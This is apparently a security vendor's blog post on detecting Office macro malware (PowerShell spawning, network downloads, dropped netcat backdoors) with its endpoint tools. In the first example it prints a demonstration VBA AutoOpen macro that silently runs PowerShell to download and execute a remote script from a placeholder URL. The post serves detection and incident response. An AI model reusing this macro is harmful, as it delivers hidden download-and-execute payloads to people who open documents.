Tech Blog

What’s old is new: Detecting Office macro malware with Tanium

Years of InfoSec experience will tell you that security threats are cyclical. What is old will become new and what is new will eventually become old. We’ve seen proof of this from the re-emergence of devastating distributed denial of service attacks, massive malvertising campaigns, and more recently, macro-based malware attacks. For example, several of the more common ransomware variants such as Dridex, Locky[1], Cryptolocker, GozNym[2] and others utilize macros to initially compromise their victims’ computers. Even suspected nation state malware such as BlackEnergy[3] has utilized macros to deliver malicious payloads to victims. Just a month ago, Microsoft’s Office 365 Advanced Threat Protection team indicated that 98% of Office-targeted attacks contain macros.

Macros are an easy way to execute arbitrary Visual Basic for Applications (VBA) code hidden inside an Office document. Despite the proliferation of macro-based malware (and availability of Group Policy Object settings to limit their execution[4]), many organizations heavily utilize legitimate macro-containing documents and have hesitated to implement controls that may hinder their operation.

Before the recent buzz of ransomware attacks, macros were used in an even simpler, less technically sophisticated scheme called Business E-mail Compromise (BEC) to defraud small and medium sized companies. During my time as a Supervisory Special Agent with the Major Cyber Crimes Unit at FBI’s Cyber Division, we released a report on BEC which concluded that from late 2013 to early 2016 more than 17,000 victims in all 50 states, and roughly 80 different countries, were victimized by suspected organized crime groups for a total of $2.3 billion in loses[5][6].

Regardless of the end goal of the attacker, macro-based malware most often utilizes one or more of the following techniques:

  1. Execute a native process or secondary interpreter, such as PowerShell, to execute parameters or additional script code
  2. Establish a remote connection to a malicious website to either download and execute remote code, or to post information supplied by a victim
  3. Embed the complete contents of a malicious file within the document to “drop” and execute it locally

This post will explore these techniques and various approaches to detecting and analyzing them using the Tanium platform.

Example #1 – Detecting macros that spawn PowerShell or other anomalous processes

The following example utilizes a macro in an Office document that launches a PowerShell command line. Arguments supplied to this instance of PowerShell allow it to retrieve and execute additional code from a remote URL:

Sub AutoOpen()

shellOut = Shell(“powershell -nop -c ” & Chr(34) & “iex(New-Object Net.WebClient).DownloadString(‘https://[URL_goes_here]/demo.ps1′); Infect-Host > C:\Windows\Temp\1.txt” & Chr(34) & “”, vbHide)

End Sub

We’ll use a Tanium hunting dashboard that applies a methodology-based indicator to continuously monitor for anomalous execution of PowerShell across all endpoints. In this specific case, “anomalous” means “powershell.exe” launched as a sub-process of common Office applications, such as Excel or Word, that are common targets of macro malware. This dashboard utilizes the historical executed process data captured by Tanium Trace.

Figure 1 shows an excerpt of matching results, including the PowerShell command line, from an infected system named “WIN7-INTERACT”:

fig1

Figure 1 – Excerpt of hunting dashboard for PowerShell spawned by Office applications

Having detected this anomalous activity, we can utilize the Trace workbench to conduct deep-dive analysis on the impacted system. Figure 2 shows that Tanium recorded the full command line, process path, parent command line, and several other details for this anomalous instance of “powershell.exe”. Additionally, the “swim lane” visualization plots file, registry, network and child-process events attributed to this process.

As highlighted, note that the PowerShell command produced an output file named “C:\Windows\Temp\1.txt”. We could use Trace to retrieve this file from the system and further examine its contents.

fig2

Figure 2 – Trace drill-down view examining a malicious instance of PowerShell

We can also explore the Process Tree visualization to confirm the expected relationship that led us to this system in the first place: “powershell.exe” launched by “WINWORD.EXE”, as shown in Figure 3.

fig3

Figure 3 – Output from the Process Tree View

 

Other variants of macro malware follow a similar approach, but initially drop and execute VBS scripts (e.g. via the “cscript.exe” interpreter) rather than directly launching PowerShell as shown.

Example #2 – Detecting network activity generated by Office macros

The macro in this second example directly downloads and executes a malicious file from a remote web site. We used a benign file – a ZIP of the SysInternals “autoruns” utility – that the macro saved to a temporary directory and executed. As in the prior example, this sequence of events (irrespective of the malicious file that’s ultimately dropped and executed) creates anomalous network, process, and file system activity attributable to the Office application that opened the macro.

In this example, we’ll start with a broad ad-hoc Tanium search for historical network connections initiated to port 443 by Office applications. Figure 4 shows the initial results without any subsequent filtering. An analyst might exclude legitimate connections (such as to Microsoft’s update servers) by applying additional search filters by time range or destination IPs to further hone in on results of interest – depending on whether they were working with specific initial leads or “hunting” for outliers.

fig4

Figure 4 – Ad-hoc search results for connections to remote port 443 by Office applications

By pivoting to the Trace timeline view for one of the impacted instances of Excel.exe, we can examine each step of the macro’s interaction with the file system, spawned sub-processes, and registry changes (a selection of which are shown in Figures 5-7 below).

fig5

Figure 5 – Network connection to remote site, initiated upon macro execution

fig6

Figure 6 – Creation of “C:\Windows\temp\mmmm.zip” (retrieved from remote site)

fig7

Figure 7 – Registry changes incurred upon execution of “C:\Windows\tmp\autorunsc.exe” (after being extracted and executed from the ZIP file)

Example #3 – Analyzing file system activity generated by a macro

This final example utilizes a Microsoft Excel file with a malicious macro and an embedded Object Linking and Embedding (OLE) object containing a Windows version of netcat. Upon execution, the macro: (1) drops netcat to a temporary directory on disk, (2) drops a malicious script, “config.vbs”, that runs the backdoor, and (3) sets an autostart registry key to automatically load the script. We’ve already covered detecting or searching for process and network events initiated by a malicious macro – so let’s focus on detecting the file system activity.

We’ve set up a Trace dashboard that monitors for Office applications creating, modifying, or renaming PowerShell, VBS, and other atypical file types within temporary directories (in this case, “%APPDATA%\Local\Temp”). Once again, this data originates from Tanium Trace, which continuously monitors file system operations and links them to the associated processes. Figure 8 shows the captured events after opening the malicious document during multiple test runs.

fig8

Figure 8 – Monitoring for file system activity generated by a malicious Excel macro

A similar dashboard could apply Tanium Trace data to monitor for changes to registry auto-start locations by an Office macro. Analysts could also use an ad-hoc search, “Get AutoRuns from all machines”, via Tanium’s Incident Response content to find the outlier entry pointing to the malicious “config.vbs” script dropped by the macro.

fig9

Figure 9 – Ad-hoc query for autorun entry created by the malware


To summarize, malicious Office macros can generate anomalous process, network, file system, and registry events that present many opportunities for post-infection detection and analysis – often without having to rely on overly-specific indicators of compromise. Tanium’s Incident Response and Trace sensors can help analysts run ad-hoc searches to hunt across an environment for this activity, to use dashboards for continuous detection and monitoring, and to conduct deep-dive analysis of an impacted system.


 

[1] 2016. “Locky” crypto-ransomware rides in on malicious Word … http://arstechnica.com/security/2016/02/locky-crypto-ransomware-rides-in-on-malicious-word-document-macro/.

[2] Banking Trojans Nymaim, Gozi Merge to Steal $4M. https://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/.

[3] 2016. APT Malware Analysis: BlackEnergy/Додаток1 Excel VBA … http://www.vkremez.com/cyber-security/apt-malware-analysis-blackenergy1-excel-vba-dropper.

[4] 2016. New feature in Office 2016 can block macros and help … https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/.

[5] 2015. FBI — Business E-Mail Compromise. https://www.fbi.gov/news/stories/2015/august/business-e-mail-compromise/business-e-mail-compromise.

[6] 2016. FBI — FBI Warns of Rise in Schemes Targeting Businesses … https://www.fbi.gov/cleveland/press-releases/2016/fbi-warns-of-rise-in-schemes-targeting-businesses-and-online-fraud-of-financial-officers-and-individuals.

Like what you see? Click here and sign up to receive the latest Tanium news and learn about our upcoming events.

Featured Webinars

Upcoming Events

Contact Sales


Press Inquiries


Thank you for contacting us


Back to the Tanium Home Page